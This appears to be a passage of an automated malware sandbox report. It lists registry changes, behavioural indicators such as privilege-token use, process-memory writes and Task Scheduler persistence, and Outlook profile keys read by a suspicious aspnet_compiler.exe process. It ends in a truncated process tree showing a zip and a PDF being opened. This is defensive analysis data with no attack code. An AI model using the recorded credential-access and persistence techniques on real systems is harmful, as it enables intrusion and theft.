Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "14"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1\0	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4192	0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe
4192	0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe
4192	0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe
4576	yatvoumatyxyebal.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4576	yatvoumatyxyebal.exe
3232	Explorer.EXE
3876	9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious behavior: MapViewOfSection 14 IoCs

pid	Process
4952	38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
4952	38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
2636	svchost.exe
2636	svchost.exe
2636	svchost.exe
2636	svchost.exe
4652	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
5092	ufclwciske.exe
2516	ufclwciske.exe
2516	ufclwciske.exe
2516	ufclwciske.exe
2516	ufclwciske.exe
1044	systray.exe
1044	systray.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
3444	msedge.exe
3444	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3960	7zG.exe
Token: 35	3960	7zG.exe
Token: SeSecurityPrivilege	3960	7zG.exe
Token: SeSecurityPrivilege	3960	7zG.exe
Token: SeDebugPrivilege	2656	2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe
Token: SeDebugPrivilege	4192	0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe
Token: SeDebugPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeDebugPrivilege	3876	7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeDebugPrivilege	928	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
Token: SeDebugPrivilege	3176	49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeDebugPrivilege	4148	svchost.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeDebugPrivilege	4672	9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeDebugPrivilege	4172	aspnet_compiler.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeDebugPrivilege	2516	ufclwciske.exe
Token: SeDebugPrivilege	4532	ChromeClose.exe
Token: SeDebugPrivilege	4248	vbc.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeDebugPrivilege	1044	systray.exe
Token: SeShutdownPrivilege	3232	Explorer.EXE
Token: SeCreatePagefilePrivilege	3232	Explorer.EXE
Token: SeDebugPrivilege	4816	689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe
Token: 33	4576	yatvoumatyxyebal.exe
Token: SeIncBasePriorityPrivilege	4576	yatvoumatyxyebal.exe
Token: SeShutdownPrivilege	3232	Explorer.EXE
Token: SeCreatePagefilePrivilege	3232	Explorer.EXE
Token: SeShutdownPrivilege	3232	Explorer.EXE
Token: SeCreatePagefilePrivilege	3232	Explorer.EXE
Token: SeShutdownPrivilege	3232	Explorer.EXE
Token: SeCreatePagefilePrivilege	3232	Explorer.EXE

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
3960	7zG.exe
2784	AcroRd32.exe
3176	49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe

Suspicious use of SetWindowsHookEx 36 IoCs

pid	Process
2784	AcroRd32.exe
2784	AcroRd32.exe
2784	AcroRd32.exe
2784	AcroRd32.exe
2860	38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
2392	OpenWith.exe
4172	aspnet_compiler.exe
1380	OpenWith.exe
3876	9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE
3232	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2784 wrote to memory of 2180	2784	AcroRd32.exe	101
PID 2784 wrote to memory of 2180	2784	AcroRd32.exe	101
PID 2784 wrote to memory of 2180	2784	AcroRd32.exe	101
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 3280	2180	RdrCEF.exe	102
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103
PID 2180 wrote to memory of 4532	2180	RdrCEF.exe	103

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-09-04.zip
1⤵
PID:212

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3232
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2023-09-04\" -spe -an -ai#7zMap15470:78:7zEvent15735
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3960
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\2023-09-04\0af4b2f2226ca4fa843cec93b45e5b13a717839df876ca60b563e11ba2acb608.pdf"
  2⤵
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=18D2D1E443BEB4D6CDC93A5721843840 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:3280
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=AA4B97FB42B939E214AA17F22777DF34 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=AA4B97FB42B939E214AA17F22777DF34 --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
      4⤵
      PID:4532
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C41E2289331639AD6EEE7B6F7EB2B134 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C41E2289331639AD6EEE7B6F7EB2B134 --renderer-client-id=4 --mojo-platform-channel-handle=2076 --allow-no-sandbox-job /prefetch:1
      4⤵
      PID:452
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=44135C589A5A20BFBA9A452488950D0E --mojo-platform-channel-handle=2224 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:4276
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
